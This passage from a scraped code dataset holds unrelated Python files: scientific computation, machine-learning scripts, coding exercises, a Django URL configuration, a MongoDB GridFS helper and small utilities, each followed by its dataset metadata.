return ('charge' + str(self.charge) + '\\n' \n 'epsilon' + str(self.epsilon) + '\\n'\n 'sigma' + str(self.sigma))\n\n def display(self):\n print('charge:' + str(self.charge) + ' ' \n 'epsilon:' + str(self.epsilon) + ' '\n 'sigma:' + str(self.sigma))\n\n# def __eq__(self, other):\n# return (self.charge == other.charge and \n# self.epsilon == other.epsilon and\n# self.sigma == other.sigma)\n\nclass Molecule:\n \"\"\"A molecule class\"\"\"\n def __init__(self, atoms):\n self.sites = atoms\n\n def __str__(self):\n return ('sites ' + str(len(self.sites)) + '\\n' +\n str(self.sites))\n\n def display(self):\n print('*** start print molecule ***')\n print('sites', str(len(self.sites)))\n for atom in self.sites:\n atom.display()\n print('*** end print molecule **')\n \n# def __eq__(self, other):\n# return self.sites == other.sites\n\nclass System:\n \"\"\"A system class\"\"\"\n def __init__(self, volume, solute, solvent, slvNum):\n self.volume = volume\n self.solute = solute\n self.solvent = solvent\n self.slvNum = dict(zip(solvent, slvNum))\n self.slvNumDensity = dict(zip(solvent, [self.slvNum[slv] / volume for slv in solvent]))\n\n def __str__(self):\n return ('volume ' + str(self.volume) + '\\n'\n 'solute\\n' +\n str(self.solute) + '\\n'\n 'solvent ' + str(len(self.solvent)) + '\\n' +\n str(self.solvent) + '\\n' +\n 'solvent number' + '\\n' +\n str(self.slvNum) + '\\n' +\n 'solvent numDensity\\n' + \n str(self.slvNumDensity))\n \n def display(self):\n print('***** start print system *****')\n print('volume ', self.volume)\n print('solute')\n self.solute.display()\n print('solvent ', len(self.solvent))\n for slv in self.solvent:\n print('number', self.slvNum[slv])\n print('numDensity', self.slvNumDensity[slv])\n slv.display()\n print('***** end print system *****')\n\n #obsolete (incomplete)\n# def getElrc_Karino(self, rs, rc):\n# elrc = {}\n# for slv in self.solvent:\n# for slvSite in slv.sites:\n# for sltSite in self.solute.sites:\n# ep = math.sqrt(slvSite.epsilon * sltSite.epsilon)\n\n\n def getElrc(self, vtype, rs, rc):\n if vtype == 'Switch':\n pass\n elif vtype == 'Cut-off':\n rs = rc\n else: \n sys.exit(\"Sorry, the vdwtype = \" + vtype + \" has not been implemented, yet.\\n\"\n \"Currently only vdwtype = Cut-off or Switch is supported\")\n elrc = {}\n if rs != rc:\n C3_0 = (rc**2 - rs**2)**3\n C3_2 = 3.0 * rs**2 + 3.0 * rc**2\n C3_3 = 6.0 * rc**2 * rs**2\n C3_4 = rc**6 - 3.0 * rc**4 * rs**2\n\n for slv in self.solvent:\n C0 = 16.0 * math.pi * self.slvNumDensity[slv]\n elrc[slv] = 0.0\n for slvSite in slv.sites:\n for sltSite in self.solute.sites:\n eps = math.sqrt(slvSite.epsilon * sltSite.epsilon)\n sig_2 = slvSite.sigma * sltSite.sigma \n sig_6 = sig_2**3\n sig_12 = sig_6 * sig_6 \n\n term1 = sig_12 / (9.0 * rs**9)\n term2 = -sig_6 / (3.0 * rs**3)\n\n if (rs == rc): \n term3 = 0.\n term4 = 0.\n else:\n term3_1 = -2.0 / 3.0 * (1./rc**3 - 1./rs**3)\n term3_2 = C3_2 / 5.0 * (1./rc**5 - 1./rs**5)\n term3_3 = -C3_3 / 7.0 * (1./rc**7 - 1./rs**7)\n term3_4 = -C3_4 / 9.0 * (1./rc**9 - 1./rs**9)\n term3 = -sig_12 / C3_0 * (term3_1 + term3_2 + term3_3 + term3_4)\n \n term4_1 = -2.0 / 3.0 * (rc**3 - rs**3)\n term4_2 = C3_2 * (rc - rs)\n term4_3 = C3_3 * (1./rc - 1./rs)\n term4_4 = C3_4 / 3.0 * (1./rc**3 - 1./rs**3)\n term4 = -sig_6 / C3_0 * (term4_1 + term4_2 + term4_3 + term4_4)\n \n elrc[slv] += eps * (term1 + term2 + term3 + term4)\n elrc[slv] *= C0 / JOULE_PER_CAL\n elrc['total'] = sum(list(elrc.values())) \n return elrc\n \n\ndef readGroLog(groLogFile, volume):\n isAverage = False\n 
isVolumeNext = False\n pars = dict.fromkeys(['volume', 'rswitch', 'rcutoff'])\n for line in groLogFile:\n if \"vdwtype\" in line.split():\n pars['vdwtype'] = line.split()[2]\n continue\n if \"rvdw_switch\" in line.split():\n pars['rswitch'] = float(line.split()[2])\n continue\n if \"rvdw\" in line.split():\n pars['rcutoff'] = float(line.split()[2])\n continue\n if \"<==== A V E R A G E S ====>\" in line:\n isAverage = True\n continue\n if isAverage and \"Volume\" in line:\n isVolumeNext = True\n idxVolume = line.split().index(\"Volume\")\n continue\n if isVolumeNext == True:\n pars['volume'] = float(line.split()[idxVolume])\n isVolumeNext = False\n isAverage = False\n if pars['volume'] == None:\n if volume == None:\n sys.exit(\"Unable to find volume in file: \" + str(groLogFile.name) + '\\n' +\n \"If it is an NVT simulation, please input the volume manually, with -v option\")\n else:\n pars['volume'] = volume\n else:\n if volume != None:\n print(\"Warning: two sources of volume were provided.\") \n print(\" I choose the value of -v option only: \", volume)\n pars['volume'] = volume\n return pars\n\n\nparser = argparse.ArgumentParser(description='Calculate LJ long-range correction')\n#parser.add_argument('-l', '--log', type=argparse.FileType('r'), required=True,\n# help='Gromacs log file, for obtaining average volume.')\nparser.add_argument('-l', '--log', required=True,\n help='Gromacs log file, for obtaining average volume.')\nparser.add_argument('-d', '--dir', default=os.getcwd(),\n help='directory where MDinfo and SltInfo are put (default is current working dir)')\nparser.add_argument('-v', '--volume', type=float, default=None, \n help='Volume info for NVT simulations')\n\nargs = parser.parse_args()\nlogFile = codecs.open(args.log, \"r\", \"utf-8\")\n#pars = readGroLog(args.log, args.volume)\npars = readGroLog(logFile, args.volume)\n\nMDinfo = open(args.dir + \"/MDinfo\", 'r')\nSltInfo = open(args.dir + \"/SltInfo\", 'r')\n\n\n#reading MDinfo\nlineCounter = 1\nfor line in MDinfo:\n if lineCounter == 1:\n numTotalType = int(line.split()[1])\n if lineCounter == 2:\n molNum = [int(i) for i in line.split()]\n if lineCounter == 3:\n siteNum = [int(i) for i in line.split()]\n lineCounter += 1\n\n#reading SltInfo\nlineCounter = 1\nsltAtoms = []\nfor line in SltInfo:\n record = [float(line.split()[i]) for i in range(len(line.split())) if i > 1]\n sltAtoms.append(Atom(record[0], record[1:3])) \n\nsolute = Molecule(sltAtoms)\n\n\n#reading MolPrm\nMolPrm = [open(args.dir+\"/MolPrm\"+str(i), 'r') for i in range(1,numTotalType)]\nsolvent = []\nfor file in MolPrm:\n slvAtoms = []\n for line in file:\n record = [float(line.split()[i]) for i in range(len(line.split())) if i > 1]\n slvAtoms.append(Atom(record[0], record[1:3]))\n solvent.append(Molecule(slvAtoms))\n\n#create System\nsystem = System(pars['volume'], solute, solvent, molNum[1:])\n\n#calculate long-range correction\nelrc = system.getElrc(pars['vdwtype'], pars['rswitch'], pars['rcutoff'])\n\n#output results\nprint()\nprint('dir = ' + args.dir)\n#print('log = ' + args.log.name)\nprint('log = ' + args.log)\nprint('rswitch = ' + str(pars['rswitch']))\nprint('rcutoff = ' + str(pars['rcutoff']))\nprint('average volume = ' + str(pars['volume']))\nprint('number density (nm^-3):')\nfor i in range(len(system.solvent)):\n print(' solvent %i = ' % int(i+1), system.slvNumDensity[system.solvent[i]])\nprint('-------------------------------')\nprint('elrc (kcal/mol): ')\nfor i in range(len(system.solvent)):\n print(' solvent %i = ' % int(i+1), 
elrc[system.solvent[i]])\nprint(' total = ', elrc['total'])\nprint()\n\n#debug\n#print(\"\\n\\n**** debug ****\")\n#system.display()\n\n","sub_path":"src/elrc.py","file_name":"elrc.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"492896561","text":"import time\nimport json\nfrom threading import Timer\nfrom checkWiFiClients import getSignal\ncount = 0\nTIMES = 300\nDELAY = 1\ntry:\n data = json.load(open(\"data.json\", encoding=\"utf-8\"))\nexcept:\n data = {}\n\n\ndef func():\n signal = getSignal()\n timestamp = time.time()\n for host in signal:\n for client in signal[host]:\n if client not in data:\n data[client] = {\"history\":[]}\n data[client][\"history\"].append([timestamp, host, signal[host][client][1]])\n json.dump(data, open(\"data.json\", \"w\", encoding=\"utf-8\"), ensure_ascii=False, sort_keys=True, indent=4)\n\n\ndef loop():\n global count\n func()\n count += 1\n if True:\n Timer(DELAY, loop).start()\n\n\nTimer(DELAY, loop).start()\n","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"436364648","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Alexander Schubert\n\n# IMPORTS\n\"\"\"\n\nimport numpy as np \nimport pandas as pd\nimport tensorflow as tf\nfrom Histogram import Histogram\n\n\"\"\"\ninput = pandas.DataFrame # the dataset to be used for training\nlabels = pandas.Series # the class labels\noutput_shape = integer, values for output, for this problem it will usually be 1\n\n\"\"\"\ndef neural_splitter(input, labels, output_shape=1):\n labels = np.asarray(labels).astype('float32').reshape((-1,1))\n \n if isinstance(input[0], Histogram):\n is_histogram=True\n df = pd.DataFrame()\n for i in range(len(input)):\n df = df.append(input[i].get(), ignore_index=True)\n else:\n is_histogram=False\n df = input.copy()\n \n \n \n input_shape = df.shape[1] \n hl1_shape = round(((input_shape - output_shape)/2) + output_shape)\n \n # weights and biases for each layer\n hl1_vals = {\n 'weights':tf.Variable(tf.random_normal([input_shape,hl1_shape])),\n 'biases':tf.Variable(tf.random_normal([hl1_shape])) }\n \n out_vals = {\n 'weights':tf.Variable(tf.random_normal([hl1_shape, output_shape])),\n 'biases':tf.Variable(tf.random_normal([output_shape])) }\n \n input_layer = tf.placeholder('float', [None, input_shape])\n \n def feedforward(input):\n # multiply output of input_layer wth a weight matrix and add biases\n hl1 = tf.nn.relu(\n tf.add(tf.matmul(input, hl1_vals['weights']), \n hl1_vals['biases']))\n \n logits = tf.add(tf.matmul(hl1, out_vals['weights']),\n out_vals['biases'])\n \n # multiply output of layer_1 wth a weight matrix and add biases\n out = tf.nn.sigmoid(logits)\n \n return out, logits\n \n # output_true shall have the original vector for error calculations\n output_pred, logits = feedforward(input_layer)\n output_true = tf.placeholder('float', [None, output_shape])\n \n # define our cost function\n # Binary Crossentropy is common for classification (and for a sigmoid output), while MSE is useful in regression(and linear outputs)\n\n loss = tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits( \n labels = output_true,\n logits = logits))\n \n\n #loss = tf.reduce_mean(tf.square(output_pred - output_true))\n\n\n # define our optimizer\n lr = 0.001 # Learning Rate\n optimizer = tf.train.AdamOptimizer(lr).minimize(loss)\n \n \n 
\"\"\"\n # BATCHING & TRAINING\n \"\"\"\n # defining batch size, number of epochs and learning rate \n # initialising stuff and starting the session\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n \n # running the model for X epochs taking 100 trucks in batches\n # total improvement is printed out after each epoch\n def train(input):\n \"\"\"\n TODO: cross validate\n \"\"\"\n batch_size = 100\n e = 50\n tot_rows = input.shape[0]\n for epoch in range(e):\n \n epoch_loss = 0 # initializing error as 0\n\n for i in range(int(tot_rows/batch_size)):\n # Get next batch\n batch_x = input[ i*batch_size : (i+1)*batch_size ]\n batch_y = labels[ i*batch_size : (i+1)*batch_size]\n \n # Run optimizer (backprop)\n _, c = sess.run([optimizer, loss],\\\n feed_dict={input_layer: batch_x, \\\n output_true: batch_y})\n \n epoch_loss += c\n #if epoch == 0 or epoch == 24 or epoch == 49 or epoch == 74 or epoch == 99:\n #print('Epoch', epoch+1, '/', e, 'loss:',epoch_loss)\n \n \n def run(input):\n results = output_pred.eval(session=sess,feed_dict={input_layer:input})\n #results = pd.DataFrame(data=results[0:,0:], columns=column_names)\n return results\n \n train(df)\n preds = run(df)\n if is_histogram:\n df = input.copy()\n for i in range(len(df)):\n df[i].setSplitValue(preds[i,0])\n \n return df, preds\n \n \n \n# Example of running neural net\ndef test():\n # load dataset (should be one histogram, but works for any data)\n x = pd.read_csv(\"./data/TestData.csv\") \n #drop index column (generated when saving to csv with pandas)\n x.drop(x.columns[0], axis=1, inplace=True)\n \n #extract class labels, and drop from dataframe\n labels = x['class']\n x.drop('class', axis=1, inplace=True)\n \n # run network, currently does nothing with the results, but its an array of percentile predictions\n results = neural_network(x, labels)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"NeuralSplitter.py","file_name":"NeuralSplitter.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"210531283","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def isSameTree1(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n if not p and not q:\n return True\n elif not p or not q:\n return False\n\n if p.val != q.val:\n return False\n\n if (not self.isSameTree(p.left, q.left) or\n not self.isSameTree(p.right, q.right)):\n return False\n\n return True\n\n def isSameTree2(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n q1, q2 = [p], [q]\n while q1 and q2:\n n1, n2 = q1.pop(), q2.pop()\n if not n1 and not n2:\n continue\n elif not (n1 and n2):\n return False\n elif n1.val != n2.val:\n return False\n\n q1.insert(0, n1.left)\n q2.insert(0, n2.left)\n q1.insert(0, n1.right)\n q2.insert(0, n2.right)\n\n return True\n\n def convertToTree(self, nums):\n nodes = [TreeNode(x) if x else None\n for x in nums]\n for i, n in enumerate(nodes):\n if not n:\n continue\n li = 2 * i + 1\n ri = 2 * i + 2\n if li < len(nodes):\n n.left = nodes[li]\n if ri < len(nodes):\n n.right = nodes[ri]\n return nodes[0]\n\n\nif __name__ == '__main__':\n s = Solution()\n p = s.convertToTree([1, 2])\n q = s.convertToTree([1, None, 2])\n r = s.isSameTree(p, q)\n print(r)\n p = s.convertToTree([1, 2, 1])\n q = 
s.convertToTree([1, 1, 2])\n    r = s.isSameTree1(p, q)\n    print(r)\n    p = s.convertToTree([1, 2, 3])\n    q = s.convertToTree([1, 2, 3])\n    r = s.isSameTree1(p, q)\n    print(r)\n","sub_path":"leetcode/easy/same-tree.py","file_name":"same-tree.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"514053545","text":"# Creating spark session\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.regression import LinearRegression\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder.appName(\"LinerReg App\").getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Loading the data\ndata = spark.read.format(\"csv\").option(\"header\", True) \\\n    .option(\"inferSchema\", True) \\\n    .option(\"delimiter\", \",\") \\\n    .load(\"D:\\\\UMKC\\\\__Spring2020\\\\CS5590BDP\\\\Module-2\\\\Lesson-7\\\\MachineLearning\\\\data\\\\imports-85.data\")\n\n\ndata.printSchema()\n\ndata = data.withColumnRenamed(\"wheel-base\",\"label\").select(\"label\", \"length\", \"width\", \"height\")\ndata.show()\n\nassembler = VectorAssembler(inputCols=data.columns[1:], outputCol=\"features\")\ndata = assembler.transform(data)\ndata.show()\n\n\nlr = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\n# Fit the model\nmodel = lr.fit(data)\n\n# Print the coefficients and intercept for linear regression\nprint(\"Coefficients: %s\" % str(model.coefficients))\nprint(\"Intercept: %s\" % str(model.intercept))\n\n# Summarize the model over the training set and print out some metrics\ntrainingSummary = model.summary\nprint(\"numIterations: %d\" % trainingSummary.totalIterations)\nprint(\"objectiveHistory: %s\" % str(trainingSummary.objectiveHistory))\ntrainingSummary.residuals.show()\nprint(\"RMSE: %f\" % trainingSummary.rootMeanSquaredError)\nprint(\"r2: %f\" % trainingSummary.r2)\n\n","sub_path":"ICP-14/SourceCode/regression/lineer_regression.py","file_name":"lineer_regression.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"69050285","text":"def find_grants_cap(grantsArray, newBudget):\n    tot = len(grantsArray)\n    arr = sorted(grantsArray, reverse=True)\n    arr.append(0)\n\n    # calculate the total amount we need to\n    # cut back to meet the reduced budget\n    surplus = sum(grantsArray) - newBudget\n    if surplus <= 0:\n        return arr[0]\n\n    # ok so we don't meet the budget, we must find the lowest cap\n    for i in range(tot-1):\n        # new surplus\n        surplus -= (i + 1) * (arr[i] - arr[i + 1])\n        if surplus <= 0:\n            break\n\n    abc = (-surplus / float(i + 1))\n    return arr[i + 1] + abc\n\nprint(find_grants_cap([2,100,50,120,1000], 190))","sub_path":"grants_caps.py","file_name":"grants_caps.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412036375","text":"from django.urls import path, include\r\nfrom .views import LoginView, RegisterView, RefreshView, UserProfileView\r\nfrom rest_framework.routers import DefaultRouter\r\n\r\nrouter = DefaultRouter()\r\nrouter.register(\"profile\", UserProfileView)\r\n\r\nurlpatterns = [\r\n    path('', include(router.urls)),\r\n    path('login', LoginView.as_view()),\r\n    path('register', RegisterView.as_view()),\r\n    path('refresh', 
RefreshView.as_view()),\r\n]\r\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"566069333","text":"#Gabi Tessier, 7/19/2019\n#This creates a database with MongoDB using PyMongo\nimport pymongo\nfrom bson.objectid import ObjectId\nimport gridfs\nfrom bson import objectid\n\n\n\n#uploadphoto , downloadphoto\nclass RemSensDB():\n    db = None\n    fs = None\n\n    #creates the database\n    def DataBaseInitialize(self):\n        client = pymongo.MongoClient(\"mongodb://127.0.0.1/database\")\n        #Creating a client\n        self.db = client[\"database\"]\n\n        #storing data\n        self.fs = gridfs.GridFS(self.db)\n\n    #inserts data into the database from the json file\n    #THIS IS NOT USED TO INSERT PHOTOS - ONLY DATA****\n    def insertData(self, js):\n        self.db[\"raw_images\"].insert_many(js)\n\n    #finds the object from a given id (i)\n    def findByID(self, i):\n        data = False\n        try:\n            ObjectId(i)\n        except Exception as e:\n            raise AssertionError(\"Invalid ID\")\n        for grid_out in self.fs.find({\"_id\": ObjectId(i)}):\n            data = grid_out.read()\n\n        return data\n\n\n    #finds the object from a given name (n)\n    def findByName(self, n):\n        for grid_out in self.fs.find({\"filename\": n}):\n            data = grid_out.read()\n\n        return data\n\n    # store the data in the database. Returns the id of the file in gridFS\n    def uploadphoto(self, b, name):\n        with open(b, 'rb') as b:\n            store = self.fs.put(b, filename = name)\n        return store\n\n# create an output file and store the image in the output file\n    def downloadphoto(self, a):\n        #retrieving data and returning .jpg in bytes\n        outputdata = self.fs.get(a).read()\n        return outputdata\n\n    def __init__(self):\n        self.DataBaseInitialize()\n        #self.insertData()\n\nif __name__ == \"__main__\":\n    dbMan = RemSensDB()\n\n    #---------------TEST VARIABLES--------------------#\n    na = \"image1\"\n    id = \"5d31ceeff814e0b3a9fe59de\"\n    n = \"image1.jpg\"\n    filename = \"\"\n\n    #-------------------METHODS------------------------#\n\n    #++++++++++++DO NOT USE++++++++++++++++#\n    #dbMan.insertData(file)\n    #dbMan.queryDB(query)\n    #dbMan.findByDate(da)\n\n    #+++++++++++USE++++++++++++++++++++++++#\n    #dbMan.findByName(na)\n    #dbMan.findByID(id)\n    dbMan.uploadphoto(filename, n)\n    dbMan.downloadphoto(dbMan.uploadphoto(filename, n))\n","sub_path":"RemoteSensingDB.py","file_name":"RemoteSensingDB.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"556558497","text":"\"\"\"\nExercise 5.14\nAs an example, let us look at a program that reads a value and prints the\nnumber of banknotes needed to pay that same value, as presented in listing\n5.14. 
To keep things simple, we will work only with integer values and with\nbanknotes of R$ 50, R$ 20, R$ 10, R$ 5 and R$ 1\n\"\"\"\nvalor = int(input('Enter the amount to pay: '))\ncedulas = 0\natual = 50\nwhile True:\n    if atual <= valor:\n        valor = valor - atual\n        cedulas += 1\n    else:\n        print('{} banknote(s) of R$ {}'.format(cedulas, atual))\n        if valor == 0:\n            break\n        if atual == 50:\n            atual = 20\n        elif atual == 20:\n            atual = 10\n        elif atual == 10:\n            atual = 5\n        elif atual == 5:\n            atual = 1\n        cedulas = 0\n","sub_path":"listagem_2.py","file_name":"listagem_2.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"618914588","text":"# -*- encoding:utf-8 -*-\n\nimport io\nimport os\nimport re\nimport sys\nimport imp\nimport json\nimport sqlite3\nimport datetime\n\n# save python family\nPY3 = True if sys.version_info[0] >= 3 else False\nif PY3:\n\timport configparser\n\timport queue\n\tinput = input \nelse:\n\timport Queue as queue\n\timport ConfigParser as configparser\n\tinput = raw_input\n\n\n# configuration paths\nROOT = os.path.abspath(os.path.dirname(__file__))\nJSON = os.path.abspath(os.path.join(ROOT, \".json\"))\nDATA = os.path.abspath(os.path.join(ROOT, \"app\", \".data\"))\nLOG = os.path.abspath(os.path.join(ROOT, \"app\", \".log\"))\n\n\n# add the modules folder to the package path\n__path__.append(os.path.abspath(os.path.join(ROOT, \"modules\")))\n# add custom module paths from the modules.pth file\n# targeted python code can live anywhere the user can access\npathfile = os.path.join(ROOT, \"modules.pth\")\nif os.path.exists(pathfile):\n\twith io.open(pathfile) as pathes:\n\t\tcomment = re.compile(r\"^[\\\\s]*#.*\")\n\t\tfor path in [p.strip() for p in pathes.read().split(\"\\\\n\") if not comment.match(p)]:\n\t\t\tif path != \"\":\n\t\t\t\t__path__.append(os.path.abspath(path))\n\n\ndef loadJson(name, folder=None):\n\tfilename = os.path.join(JSON, name if not folder else os.path.join(folder, name))\n\tif os.path.exists(filename):\n\t\twith io.open(filename) as in_:\n\t\t\treturn json.load(in_)\n\telse:\n\t\treturn {}\n\n\ndef dumpJson(data, name, folder=None):\n\tfilename = os.path.join(JSON, name if not folder else os.path.join(folder, name))\n\ttry: os.makedirs(os.path.dirname(filename))\n\texcept OSError: pass\n\twith io.open(filename, \"w\" if PY3 else \"wb\") as out:\n\t\tjson.dump(data, out, indent=4)\n\n\ndef logMsg(msg, logname=None, dated=False):\n\tif logname:\n\t\tlogfile = os.path.join(LOG, logname)\n\t\ttry:\n\t\t\tos.makedirs(os.path.dirname(logfile))\n\t\texcept OSError:\n\t\t\tpass\n\t\tstdout = io.open(logfile, \"a\")\n\telse:\n\t\tstdout = sys.stdout\n\n\tstdout.write(\n\t\t\">>> \" + \\\n\t\t(\"[%s] \" % datetime.datetime.now().strftime(\"%x %X\") if dated else \"\") + \\\n\t\t\"%s\\\\n\" % msg\n\t)\n\tstdout.flush()\n\n\tif logname:\n\t\treturn stdout.close()\n\n\ndef chooseItem(msg, *elem):\n\tn = len(elem)\n\tif n > 1:\n\t\tsys.stdout.write(msg + \"\\\\n\")\n\t\tfor i in range(n):\n\t\t\tsys.stdout.write(\"  %d - %s\\\\n\" % (i + 1, elem[i]))\n\t\tsys.stdout.write(\"  0 - quit\\\\n\")\n\t\ti = -1\n\t\twhile i < 0 or i > n:\n\t\t\ttry:\n\t\t\t\ti = input(\"Choose an item: [1-%d]> \" % n)\n\t\t\t\ti = int(i)\n\t\t\texcept ValueError:\n\t\t\t\ti = -1\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tsys.stdout.write(\"\\\\n\")\n\t\t\t\tsys.stdout.flush()\n\t\t\t\treturn False\n\t\tif i == 0:\n\t\t\treturn None\n\t\treturn elem[i - 1]\n\telif n == 1:\n\t\treturn 
elem[0]\n\telse:\n\t\tsys.stdout.write(\"Nothing to choose...\\n\")\n\t\treturn False\n\n\ndef initDB():\n\tdatabase = os.path.join(DATA, \"database.db\")\n\tif not os.path.exists(DATA):\n\t\tos.makedirs(DATA)\n\tsqlite = sqlite3.connect(database)\n\tcursor = sqlite.cursor()\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS history(signature TEXT, autorization TEXT);\")\n\tcursor.execute(\"CREATE UNIQUE INDEX IF NOT EXISTS history_index ON history(signature);\")\n\tsqlite.row_factory = sqlite3.Row\n\tsqlite.commit()\n\treturn sqlite\n\n","sub_path":"lystener/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"143418663","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport os, json, heapq, operator\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nfrom bisect import bisect, bisect_left, bisect_right\n\nclass InputManager:\n def __init__(self, reach, shift, length):\n self.R = reach\n self.S = shift\n self.L = length\n self.file_list = {f: pd.read_csv(os.path.join(price_path, f)).set_index('') for f in os.listdir(price_path) if not f.startswith('WIG')}\n self.samples = []\n self.labels = []\n self.encoding = 'R_' + str(self.R) + 'S_' + str(self.S)\n self.fatalities = 0\n \n def extract_data(self, start_date='19900101', end_date='20140101'):\n for name, file in self.file_list.items():\n dates = list(map(str, file.index))\n start_ind = bisect(dates, start_date)\n end_ind = bisect(dates, end_date)\n final = bisect(dates, (datetime.strptime(end_date, '%Y%m%d')+timedelta(days=self.R+3)).strftime('%Y%m%d'))\n if end_ind == final:\n end_ind -= self.R\n dates = dates[start_ind:final]\n dates_ind_dict = dict(zip(dates, list(range(len(dates)))))\n if len(dates) == 0 or end_ind < 0:\n continue\n \n prices = file[''].as_matrix()[start_ind:final]\n \n \n self.comp_sample = []\n self.comp_labels = []\n end_date_dt = datetime.strptime(dates[end_ind-start_ind], '%Y%m%d')\n \n \n for run in range(self.S):\n try:\n things = prices[run:]\n\n current_date = datetime.strptime(dates[run], '%Y%m%d')\n slices = []\n respective_dates = []\n while current_date < end_date_dt:\n c = current_date.strftime('%Y%m%d')\n while current_date < end_date_dt and c not in dates_ind_dict:\n current_date += timedelta(days=1)\n c = current_date.strftime('%Y%m%d')\n\n if current_date == end_date_dt:\n break\n slices.append(prices[dates_ind_dict[c]])\n respective_dates.append(dates[dates_ind_dict[c]])\n current_date += timedelta(days=self.S)\n\n for nr in range(len(slices)-self.L-1):\n\n last_date = respective_dates[nr+self.L+1]\n check_date = datetime.strptime(last_date, '%Y%m%d')+timedelta(days=self.R)\n while check_date < end_date_dt + timedelta(days=self.R+3) and check_date.strftime('%Y%m%d') not in dates_ind_dict:\n check_date += timedelta(days=1)\n\n if check_date.strftime('%Y%m%d') not in dates_ind_dict:\n continue\n self.samples.append(slices[nr:nr+self.L+1])\n result = int((prices[dates_ind_dict[check_date.strftime('%Y%m%d')]] - prices[dates_ind_dict[last_date]]) > 0)\n if result == 1:\n self.labels.append([0,1])\n elif result == 0:\n self.labels.append([1,0])\n except:\n print('something bad happend at', name, ' while run number', run)\n continue\n \n self.samples = np.array(self.samples)\n \n def scale(self):\n if len(self.samples)==0:\n print('no samples to preprocess')\n sample_mean = np.mean(self.samples)\n sample_std = 
np.std(self.samples)\n self.samples = (self.samples-sample_mean)/sample_std\n \n\n def polynom(self, inplace=True, degree=2):\n if len(self.samples)==0:\n print('no samples to preprocess')\n \n pf = PF(degree=degree, interaction_only=True, include_bias=False)\n if inplace:\n self.samples = pf.fit_transform(self.samples)\n return\n return pf.fit_transform(self.samples)\n \n \n \n def rel(self, inplace=False):\n if len(self.samples) == 0:\n print('no samples to preprocess')\n \n C = (self.samples[:, -1][None].T - self.samples[:, :-1])/self.samples[:, :-1]\n if inplace:\n self.samples = C\n return\n return C\n \n def get_data(self):\n return self.samples, self.labels\n \n \n \n \n \n \n\n \n \n \n \n \n \n\n","sub_path":"simple neural network/input_manager.py","file_name":"input_manager.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"647739531","text":"import math\ndef correlation_numerator(x,y,n):\n sum_xy=sum([a*b for a,b in zip(x,y)])\n sumX_sumY=sum(x)*sum(y)\n return (n*sum_xy)-(sumX_sumY)\n\ndef correlation_denominator(x,y,n):\n square_x=sum([a*b for a,b in zip(x,x)])\n total_sum_x=sum(x)*sum(x)\n square_y=sum([a*b for a,b in zip(y,y)])\n total_sum_y=sum(y)*sum(y)\n return (math.sqrt((n*square_x)-total_sum_x)*math.sqrt((n*square_y)-total_sum_y))\n\ndef pearson(num,denom):\n return num/denom\n \nn = int(input())\nmathematics = []\nphysics = []\nchemistry = []\nfor i in range(n):\n elements = list(map(float, input().split()))\n mathematics.append(elements[0])\n physics.append(elements[1])\n chemistry.append(elements[2])\n\nprint('%.2f' % pearson(correlation_numerator(mathematics,physics,n), correlation_denominator(mathematics,physics,n))) \nprint('%.2f' % pearson(correlation_numerator(physics,chemistry,n),correlation_denominator(physics,chemistry,n))) \nprint('%.2f' % pearson(correlation_numerator(chemistry,mathematics,n),correlation_denominator(chemistry,mathematics,n))) \n\n\n","sub_path":"HackPearsoncorrelation.py","file_name":"HackPearsoncorrelation.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"286288988","text":"\"\"\"\n`PartitionRefinement` is a data structure for representing a partition of a\nset. 
